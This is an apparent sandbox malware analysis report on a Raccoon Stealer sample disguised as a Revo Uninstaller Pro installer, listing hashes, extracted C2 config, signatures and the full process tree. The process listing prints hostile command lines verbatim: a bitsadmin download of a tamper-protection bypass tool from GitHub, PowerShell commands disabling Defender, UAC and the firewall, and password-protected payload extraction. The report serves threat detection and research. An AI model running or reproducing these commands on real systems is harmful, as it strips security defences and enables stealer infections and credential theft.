Analysis
-
max time kernel
151s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
16/03/2024, 03:28
Static task
static1
Behavioral task
behavioral1
Sample
ccfdadcd4bd9dd07ccd30448d207dd9d.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
ccfdadcd4bd9dd07ccd30448d207dd9d.exe
Resource
win10v2004-20231215-en
General
-
Target
ccfdadcd4bd9dd07ccd30448d207dd9d.exe
-
Size
18.8MB
-
MD5
ccfdadcd4bd9dd07ccd30448d207dd9d
-
SHA1
dcb46dd2a9446489af64cb9244d36c138c653738
-
SHA256
50e46868dec1ccf12f805464f0bdf31f87ca8e136b2921b7b067b5a76eb21b2f
-
SHA512
88507e55b26b64a16d6d1bea824bd997eb4c859adc30660071607298b53eb0f1bfcc4c9a795248ad8d647438cc38e46ec82ee6aab969efb71cfdc1a34947ad1c
-
SSDEEP
393216:zUIDoA1J6MFSxbz81bl5n1QMBIbzmE030vc6c2VQy:vD96M0FklVBW+30U6cwQy
Malware Config
Extracted
raccoon
1.7.3
0343d4da493d263f78921a8724ca6adf05347cfe
-
url4cnc
https://telete.in/jbitchsucks
Signatures
-
Raccoon Stealer V1 payload 4 IoCs
resource yara_rule behavioral1/memory/2468-373-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral1/memory/2468-375-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral1/memory/2468-379-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 behavioral1/memory/2468-381-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon_v1 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2308 netsh.exe -
Executes dropped EXE 17 IoCs
pid Process 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 2692 Revo Uninstaller Pro 4.2.3.exe 2004 Revo Uninstaller Pro 4.2.3.tmp 2664 7z.exe 1676 7z.exe 2520 7z.exe 2312 7z.exe 2384 7z.exe 1868 7z.exe 2288 7z.exe 2280 7z.exe 1060 7z.exe 1696 7z.exe 1364 7z.exe 2916 7z.exe 2328 edhWjul.exe 2468 edhWjul.exe -
Loads dropped DLL 30 IoCs
pid Process 2372 ccfdadcd4bd9dd07ccd30448d207dd9d.exe 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 2692 Revo Uninstaller Pro 4.2.3.exe 2004 Revo Uninstaller Pro 4.2.3.tmp 2004 Revo Uninstaller Pro 4.2.3.tmp 2004 Revo Uninstaller Pro 4.2.3.tmp 2004 Revo Uninstaller Pro 4.2.3.tmp 2004 Revo Uninstaller Pro 4.2.3.tmp 2788 cmd.exe 2664 7z.exe 1676 7z.exe 2520 7z.exe 2312 7z.exe 2384 7z.exe 1868 7z.exe 2288 7z.exe 2280 7z.exe 1060 7z.exe 1696 7z.exe 1364 7z.exe 2916 7z.exe 2788 cmd.exe 2608 WerFault.exe 2608 WerFault.exe 2608 WerFault.exe 2608 WerFault.exe 2608 WerFault.exe 2608 WerFault.exe 2608 WerFault.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 raw.githubusercontent.com 3 raw.githubusercontent.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2328 set thread context of 2468 2328 edhWjul.exe 75 -
Drops file in Program Files directory 2 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe ccfdadcd4bd9dd07ccd30448d207dd9d.tmp File created C:\Program Files (x86)\is-RN86U.tmp ccfdadcd4bd9dd07ccd30448d207dd9d.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2608 2468 WerFault.exe 75 -
Delays execution with timeout.exe 1 IoCs
pid Process 1296 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 2868 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 2004 Revo Uninstaller Pro 4.2.3.tmp 1820 powershell.exe 2664 powershell.exe 1676 powershell.exe 2312 powershell.exe 2128 powershell.exe 1100 powershell.exe 1700 powershell.exe 2920 powershell.exe 1732 powershell.exe 2356 powershell.exe 2068 powershell.exe 2904 powershell.exe 2436 powershell.exe 3004 powershell.exe 1172 powershell.exe 2876 powershell.exe 1820 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2004 Revo Uninstaller Pro 4.2.3.tmp -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1820 powershell.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 2312 powershell.exe Token: SeDebugPrivilege 2128 powershell.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 1700 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 2904 powershell.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe Token: SeDebugPrivilege 1172 powershell.exe Token: SeDebugPrivilege 2876 powershell.exe Token: SeDebugPrivilege 1820 powershell.exe Token: SeRestorePrivilege 2664 7z.exe Token: 35 2664 7z.exe Token: SeSecurityPrivilege 2664 7z.exe Token: SeSecurityPrivilege 2664 7z.exe Token: SeRestorePrivilege 1676 7z.exe Token: 35 1676 7z.exe Token: SeSecurityPrivilege 1676 7z.exe Token: SeSecurityPrivilege 1676 7z.exe Token: SeRestorePrivilege 2520 7z.exe Token: 35 2520 7z.exe Token: SeSecurityPrivilege 2520 7z.exe Token: SeSecurityPrivilege 2520 7z.exe Token: SeRestorePrivilege 2312 7z.exe Token: 35 2312 7z.exe Token: SeSecurityPrivilege 2312 7z.exe Token: SeSecurityPrivilege 2312 7z.exe Token: SeRestorePrivilege 2384 7z.exe Token: 35 2384 7z.exe Token: SeSecurityPrivilege 2384 7z.exe Token: SeSecurityPrivilege 2384 7z.exe Token: SeRestorePrivilege 1868 7z.exe Token: 35 1868 7z.exe Token: SeSecurityPrivilege 1868 7z.exe Token: SeSecurityPrivilege 1868 7z.exe Token: SeRestorePrivilege 2288 7z.exe Token: 35 2288 7z.exe Token: SeSecurityPrivilege 2288 7z.exe Token: SeSecurityPrivilege 2288 7z.exe Token: SeRestorePrivilege 2280 7z.exe Token: 35 2280 7z.exe Token: SeSecurityPrivilege 2280 7z.exe Token: SeSecurityPrivilege 2280 7z.exe Token: SeRestorePrivilege 1060 7z.exe Token: 35 1060 7z.exe Token: SeSecurityPrivilege 1060 7z.exe Token: SeSecurityPrivilege 1060 7z.exe Token: SeRestorePrivilege 1696 7z.exe Token: 35 1696 7z.exe Token: SeSecurityPrivilege 1696 7z.exe Token: SeSecurityPrivilege 1696 7z.exe Token: SeRestorePrivilege 1364 7z.exe Token: 35 1364 7z.exe Token: SeSecurityPrivilege 1364 7z.exe Token: SeSecurityPrivilege 1364 7z.exe Token: SeRestorePrivilege 2916 7z.exe Token: 35 2916 7z.exe Token: SeSecurityPrivilege 2916 7z.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2608 2372 ccfdadcd4bd9dd07ccd30448d207dd9d.exe 28 PID 2372 wrote to memory of 2608 2372 ccfdadcd4bd9dd07ccd30448d207dd9d.exe 28 PID 2372 wrote to memory of 2608 2372 ccfdadcd4bd9dd07ccd30448d207dd9d.exe 28 PID 2372 wrote to memory of 2608 2372 ccfdadcd4bd9dd07ccd30448d207dd9d.exe 28 PID 2372 wrote to memory of 2608 2372 ccfdadcd4bd9dd07ccd30448d207dd9d.exe 28 PID 2372 wrote to memory of 2608 2372 ccfdadcd4bd9dd07ccd30448d207dd9d.exe 28 PID 2372 wrote to memory of 2608 2372 ccfdadcd4bd9dd07ccd30448d207dd9d.exe 28 PID 2608 wrote to memory of 2688 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 29 PID 2608 wrote to memory of 2688 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 29 PID 2608 wrote to memory of 2688 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 29 PID 2608 wrote to memory of 2688 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 29 PID 2608 wrote to memory of 2692 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 30 PID 2608 wrote to memory of 2692 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 30 PID 2608 wrote to memory of 2692 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 30 PID 2608 wrote to memory of 2692 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 30 PID 2608 wrote to memory of 2692 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 30 PID 2608 wrote to memory of 2692 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 30 PID 2608 wrote to memory of 2692 2608 ccfdadcd4bd9dd07ccd30448d207dd9d.tmp 30 PID 2692 wrote to memory of 2004 2692 Revo Uninstaller Pro 4.2.3.exe 31 PID 2692 wrote to memory of 2004 2692 Revo Uninstaller Pro 4.2.3.exe 31 PID 2692 wrote to memory of 2004 2692 Revo Uninstaller Pro 4.2.3.exe 31 PID 2692 wrote to memory of 2004 2692 Revo Uninstaller Pro 4.2.3.exe 31 PID 2692 wrote to memory of 2004 2692 Revo Uninstaller Pro 4.2.3.exe 31 PID 2692 wrote to memory of 2004 2692 Revo Uninstaller Pro 4.2.3.exe 31 PID 2692 wrote to memory of 2004 2692 Revo Uninstaller Pro 4.2.3.exe 31 PID 2688 wrote to memory of 2496 2688 WScript.exe 32 PID 2688 wrote to memory of 2496 2688 WScript.exe 32 PID 2688 wrote to memory of 2496 2688 WScript.exe 32 PID 2688 wrote to memory of 2496 2688 WScript.exe 32 PID 2496 wrote to memory of 2872 2496 cmd.exe 34 PID 2496 wrote to memory of 2872 2496 cmd.exe 34 PID 2496 wrote to memory of 2872 2496 cmd.exe 34 PID 2496 wrote to memory of 2872 2496 cmd.exe 34 PID 2496 wrote to memory of 2868 2496 cmd.exe 35 PID 2496 wrote to memory of 2868 2496 cmd.exe 35 PID 2496 wrote to memory of 2868 2496 cmd.exe 35 PID 2496 wrote to memory of 2868 2496 cmd.exe 35 PID 2496 wrote to memory of 1820 2496 cmd.exe 36 PID 2496 wrote to memory of 1820 2496 cmd.exe 36 PID 2496 wrote to memory of 1820 2496 cmd.exe 36 PID 2496 wrote to memory of 1820 2496 cmd.exe 36 PID 2496 wrote to memory of 2664 2496 cmd.exe 37 PID 2496 wrote to memory of 2664 2496 cmd.exe 37 PID 2496 wrote to memory of 2664 2496 cmd.exe 37 PID 2496 wrote to memory of 2664 2496 cmd.exe 37 PID 2496 wrote to memory of 1676 2496 cmd.exe 38 PID 2496 wrote to memory of 1676 2496 cmd.exe 38 PID 2496 wrote to memory of 1676 2496 cmd.exe 38 PID 2496 wrote to memory of 1676 2496 cmd.exe 38 PID 2496 wrote to memory of 2312 2496 cmd.exe 39 PID 2496 wrote to memory of 2312 2496 cmd.exe 39 PID 2496 wrote to memory of 2312 2496 cmd.exe 39 PID 2496 wrote to memory of 2312 2496 cmd.exe 39 PID 2496 wrote to memory of 2128 2496 cmd.exe 40 PID 2496 wrote to memory of 2128 2496 cmd.exe 40 PID 2496 wrote to memory of 2128 2496 cmd.exe 40 PID 2496 wrote to memory of 2128 2496 cmd.exe 40 PID 2496 wrote to memory of 1100 2496 cmd.exe 41 PID 2496 wrote to memory of 1100 2496 cmd.exe 41 PID 2496 wrote to memory of 1100 2496 cmd.exe 41 PID 2496 wrote to memory of 1100 2496 cmd.exe 41 PID 2496 wrote to memory of 1700 2496 cmd.exe 42 PID 2496 wrote to memory of 1700 2496 cmd.exe 42 PID 2496 wrote to memory of 1700 2496 cmd.exe 42
Processes
-
C:\Users\Admin\AppData\Local\Temp\ccfdadcd4bd9dd07ccd30448d207dd9d.exe"C:\Users\Admin\AppData\Local\Temp\ccfdadcd4bd9dd07ccd30448d207dd9d.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Users\Admin\AppData\Local\Temp\is-KDIVJ.tmp\ccfdadcd4bd9dd07ccd30448d207dd9d.tmp"C:\Users\Admin\AppData\Local\Temp\is-KDIVJ.tmp\ccfdadcd4bd9dd07ccd30448d207dd9d.tmp" /SL5="$70120,18949401,788992,C:\Users\Admin\AppData\Local\Temp\ccfdadcd4bd9dd07ccd30448d207dd9d.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\dDWZgIfB3cDEsz\5jayrzw1q.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\dDWZgIfB3cDEsz\avNIprUwIk.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f5⤵PID:2872
-
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe5⤵
- Download via BitsAdmin
PID:2868
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force5⤵
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2876
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
PID:2308
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\dDWZgIfB3cDEsz\main.bat" "4⤵
- Loads dropped DLL
PID:2788 -
C:\Windows\SysWOW64\mode.commode 65,105⤵PID:1120
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e file.zip -p___________26299pwd15425pwd19346___________ -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_11.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_10.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2520
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_9.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2312
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_8.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2384
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_7.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1868
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_6.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_5.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_4.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1060
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_3.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_2.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\ProgramData\dDWZgIfB3cDEsz\7z.exe7z.exe e extracted/file_1.zip -oextracted5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\ProgramData\dDWZgIfB3cDEsz\edhWjul.exe"edhWjul.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2328 -
C:\ProgramData\dDWZgIfB3cDEsz\edhWjul.exe"C:\ProgramData\dDWZgIfB3cDEsz\edhWjul.exe"6⤵
- Executes dropped EXE
PID:2468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 1847⤵
- Loads dropped DLL
- Program crash
PID:2608
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\dDWZgIfB3cDEsz\delXPDUR9c.bat" "4⤵PID:1812
-
C:\Windows\SysWOW64\timeout.exetimeout /T 180 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:1296
-
-
-
-
C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\is-7RUGN.tmp\Revo Uninstaller Pro 4.2.3.tmp"C:\Users\Admin\AppData\Local\Temp\is-7RUGN.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$301C2,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:2004
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.3MB
MD59c27c6b536edecdd67ec7db50e3dcf70
SHA1ec9a2776c9c007eb53b50abeb06a250b6d333545
SHA25647cdae8bf2ea4197aded9663dacf3782388a8a70ba472bb88eea4ce281bcfa41
SHA51265e652c20ca0ac225cf4581ad171b886157b0448cc0900c4f582a879ea6d4b5680b7cd974fe63a773dd6d49e4fcd14c994f69d851acca2f2961ee1bbdef685e1
-
Filesize
2.8MB
MD5ac4cc69d24b461c1ba140f5c6565f424
SHA1a3b8efa5b67c0426567693d3e35a46d536b25ee1
SHA25674bac98ca03243616dc9f17d8026aeda033cddb258e19e061c3ee0c8f9cc92a0
SHA51292b68cfc6b54675e715db1b7db04e176e4d951ec369626dffc4ed1c7e42ccbc5b281d685bb2d169a8a724d3c13e61f21e30139eceee288b81dbce7380243b261
-
Filesize
96KB
MD5c84933bcccf41369ef9ecce015b86ed0
SHA1624713276ae217d8d05c03598eecd31209c7f77a
SHA256ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679
SHA512221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363
-
Filesize
458KB
MD5619f7135621b50fd1900ff24aade1524
SHA16c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA5122c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628
-
Filesize
22KB
MD5b0a7842dd51df8942bc8b837282d1c2b
SHA10e9432597657c28ca9ac766ac7bf0a903d6aeb3b
SHA2564a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8
SHA512b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6
-
Filesize
111B
MD5308ba58a50ffa9eabd31fdba79af6dd1
SHA129c09164facb6419f9d7f9e103f7e13bed4743a1
SHA2560ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243
SHA512674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f
-
Filesize
949KB
MD5c441d5711e3bd95fb0dd573514df2ee5
SHA1aacf843613a07248eacaa2f853903500f888a0d3
SHA256c35ee6f83c52b8bed24f3ce16d2d0cefc4d2c8808df3c0526b4eda5b2d51beef
SHA512d12582d924e2c2356902c6bd892591b5406f52d0f41ccbd73838749bde792b9b1fa13fe6db562c82515ac44a700fed1c88a2f76f6499a1fdb81ae575757ca321
-
Filesize
2.4MB
MD5f376031c3590ecdaaf64a211b7db6e46
SHA1c07dbfd445f1c2dcb3229bd73f0c678583dbea82
SHA256b561ba030098ecba66b7deab7b929e601561723f39221976c0e5c9fd0d466e7c
SHA5129b886c806d66b05371187c2cbe43bbe8cad9dabcdb919b3b9ccdcc8c8c4018b5e4070252a4f177b4113716012fc8ed18759a3959cbbb43a9523e2cd913fe345c
-
Filesize
949KB
MD5ed746fca4dbe5f0f50729095b7d65582
SHA18dc586cc67298380c2328d458cfd7ec505763075
SHA256ac101aa441378ddf7e049718621aa93beccccff6d3054796796ea40e89b66864
SHA5122984cd27dcaaed639ef53ae6c5646c8fabde4bc3d2cd44612f382727eabd3273694c94e8d2359a16ba27647c77131ec2e62486b89999a1dbea0936833749a7a9
-
Filesize
949KB
MD5ae804e3b0265d764ebd16592c1c72a9b
SHA1c3e44e07db31bc01ca1b4768f1341f4cc2aa657c
SHA2566216c409eb61c77e21d882ea9872fae1fe54ba50eed84a3b8008e80c491691c3
SHA512d803908814d89c944f20c7aba5da837ecf8a6f3a4e4fb0d06b572a3aabffb95476bb5d96d0b654003d0697a6ae91e210884d213e32e7aa79157ed65473344dce
-
Filesize
949KB
MD5a3eefa4eb17a55a19598602f9530f7c6
SHA126954afa7e842f10926968610f4d95d0c40f942a
SHA256f81e1b2298533aca21928ee07e61bd59664631405582662bee331bc97c52da6b
SHA512932821f33d9a636d8b3002d1eeaaf62bac55c39670a29283d5b64ade191335f759d29b18cf9af74f3486613f29bec9e141cb303c5e1ed549189324a8cf856f6a
-
Filesize
949KB
MD55082396bd2ea5a00e117b8262c15e5a1
SHA165c87fa1c74a9f19793319fe5f0cf5418afa3d7d
SHA256d0a9c80e91df5d77e820ff136bc4cc9193f4dc72a540ffd7e49fda34591c1fdc
SHA51214bbea80376660abdfcdbc1d1db512ed99cf3dc74294fce4dac6084b3fbd4dfebe302be26b7cd06c9ae1332cb3f771885b43760ecac4825657fcab7c822f120f
-
Filesize
2.4MB
MD591f43c2d2c974c653842129d57dff6f9
SHA1642e7c9d23b769f667907df85cf376f9df8f036f
SHA256a0fb05d42ad16ece373d23383a1b6e6b4bf4b29dcc24bb75d1440ba24c92b549
SHA51215cb42a42ba0ac8bddc003601d659da5d2eea35976de0550e4dfa8b8574781b602de0b4fa95bef8924dd1c54a112db4bf35e924d9dd79dbdae59ae878433f98f
-
Filesize
405B
MD53daec3601ed9efd5654b021771d2d9e5
SHA1538741c7b1430182abc2e7f3965f6bfb5942a523
SHA256aa529b4663e2664fc8629b15c59cb7b613f9451bc78a58cce7aec2112a95b372
SHA512fd7e7eb26be0b644cc8a9a3031d513faa7708cacce0612f86437f77d8c26e1a98dfff8540d4c3d9d4efeb3a3320fccd716bfbca805d53b4520c37ba0b5cc3568
-
Filesize
982KB
MD574f1186a6d3bc01716681712c6b24a74
SHA19c015d4a4d4a9c7ee4619ea2e2068143c3b81e18
SHA256d4c2a4940f43e5bdab3963fb2a357f52ae6866e6dc4426909f828b2228af814d
SHA512bea8504e1b2244ac425cde33a34d6ac5e6f77d75050c6646d7abebbdaf9d0eab91ca7e4e41abea2aed9c55c445d1c924a62d46a9b08bfe81661982fdf14e20e0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
